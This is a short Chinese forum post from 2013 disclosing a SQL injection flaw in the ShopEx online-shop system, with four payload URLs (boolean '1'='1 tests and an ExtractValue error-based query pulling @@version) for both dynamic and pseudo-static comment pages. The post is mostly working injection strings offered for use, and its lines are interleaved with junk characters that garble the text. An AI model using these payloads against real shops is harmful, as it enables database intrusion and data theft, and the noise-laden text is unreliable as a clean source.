注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…! g- i% ]5 Y6 C* d" Y# \
. U5 ?# K# O* E好吧,我扯远了~~
$ p) s, x! I/ C4 ]8 R其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~$ Z. O: E) x7 }9 e
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
) l5 v; G/ H# F2 J+ h
. D/ O- U; z! W* s1 nhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
# Z/ J$ P6 @) ^* ]4 e) x- t2 N& R/ R( m. H4 p4 v6 L: A, R! \
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
& l5 r4 j* ~' q- o. `4 V4 Z; p; Y8 I* b, \+ W4 c
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
0 P* g" ]4 U: b. u6 t
2 [2 t& ?4 Y* d7 b( dhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html4 }4 G7 |) Z h% l# D+ y: `
; t& u6 ]' A; T% U 8 _) ~/ I! o) B% n7 p/ `) Z: q
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
0 V& \( E4 d2 x: [, s" r如何注入就不多说了,10多年的东西了…不会也会了…
; `- M% k$ {& O% f4 ^) Y9 \! S) W0 G6 S: B4 o
|
发表于 2013-2-4 16:20:04
收藏
支持
反对